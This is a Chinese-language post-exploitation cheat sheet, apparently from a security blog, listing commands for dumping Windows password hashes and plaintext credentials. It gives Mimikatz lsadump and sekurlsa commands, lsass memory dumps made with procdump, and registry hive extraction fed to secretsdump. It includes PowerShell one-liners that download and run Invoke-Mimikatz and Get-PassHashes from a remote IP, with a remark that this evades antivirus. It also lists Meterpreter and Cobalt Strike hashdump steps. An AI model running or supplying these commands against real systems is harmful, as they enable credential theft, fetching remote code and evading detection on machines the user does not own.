Windows获取密码凭证
Mimikatz本机非交互获取
mimikatz.exe “log res.txt” “privilege::debug” “token::elevate” “lsadump::sam” “exit”
mimikatz.exe “log logon.txt” “privilege::debug” “sekurlsa::logonpasswords” “exit”
命令解析:
“log res.txt” //将获取信息保存如本地运行路径 res.txt
privilege::debug //提升权限
“lsadump::sam” //将sam密码库,lsadump下来,
“sekurlsa::logonpasswords”//lohonpasswprds列出所有可用的提供程序凭据
1.x版本
inject::process lsass.exe sekurlsa.dll //注入 sekurlsa.dll 到 lsass.exe(用户登录程序) 进程里
@getLogonPasswords //获取密码
Powershell脚本
远程加载mimikatz脚本
powershell IEX (New-Object Net.WebClient).DownloadString(‘http://47.96.224.128:8008/Invoke-Mimikatz.ps1');Invoke-Mimikatz –DumpCreds
解释:
powershell开启一个IEX缓存会话,从’http://39.108.68.207:8000/Invoke-Mimikatz.ps1加载远程脚本获取.缓存加载减少,被查杀的概率
注意本地回显并不会回显到VPS服务器上
远程加载Get-PassHashes脚本
powershell IEX(new-object net.webclient).downloadstring(‘http://47.96.224.128:8008/Get-PassHashes.ps1');Get-PassHashes
于上原理一致
WCE
WCE:Windows Credentials Editor WCE是跟mimikztz齐名的一款hash管理工具。
官网地址:https://www.ampliasecurity.com/research.html
32位下载:https://www.ampliasecurity.com/research/wce_v1_42beta_x32.zip
64位下载:https://www.ampliasecurity.com/research/wce_v1_42beta_x64.zip
Pwddump
Ophcrack与彩虹表
如果网站无法破解出hash值,我们可以使用ophcrack工具配合彩虹表自己破解。
工具下载:https://ophcrack.sourceforge.io/
彩虹表:
https://ophcrack.sourceforge.io/tables.php
http://project-rainbowcrack.com/table.htm
Procdump + Mimikatz
Procdump下载: https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump
Procdump lsass 进程导出:
For 32bits:procdump.exe -accepteula -ma lsass.exe lsass.dmp
For 64bits:procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp
再把lsass.dmp文件加载mimikatz
sekurlsa::minidump lsass.dmp
最后显示
sekurlsa::logonPasswords full
注册表Get hash
reg save HKLMSYSTEM system.hiv
reg save HKLMSAM sam.hiv
reg save HKLMSECURITY security.hiv
mimikatz.exe “lsadump::sam /system:system.hiv /sam:sam.hiv” exit
python secretsdump.py -sam sam.hiv -security security.hiv -system system.hiv LOCAL
与之前方式不同
LaZagne
自动化获取脚本
项目地址: https://github.com/AlessandroZ/LaZagne
Meterpreter获取Hash
发不多说上马拿meterpreter
两种后渗透获取:
use post/windows/gather/hashdump //system权限的meterpreter
use post/windows/gather/smart_hashdump
或者
直接
Mimikatz
Load mimikatz
获取用户密码的hash值
wdigest 、kerberos 、msv 、ssp 、tspkg 、livessp
mimikatz_command -h
mimikatz_command -f :: //查询有哪些模块
mimikatz_command -f samdump::hashes //从windows的sam文件中读取密码hash值
mimikatz_command -f sekurlsa::searchPasswords //获取明文密码
mimikatz_command -f samdump::bootkey
Cobaltstrrike获取
hashdump
logonpasswords
mimikatz sekurlsa::logonpasswords
FROM :https://ailumao.cn/ | Author:Ailumao
CTF PlainR2B-PWN 很明显的栈溢出,第一次溢出打印write函数的地址,然后从和libc中的地址寻找偏移,最后利用system函数和libc中的/bin/sh,getshell后运行服务器上的getflag程序随意输入一些东西,进行多轮后会输出f…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论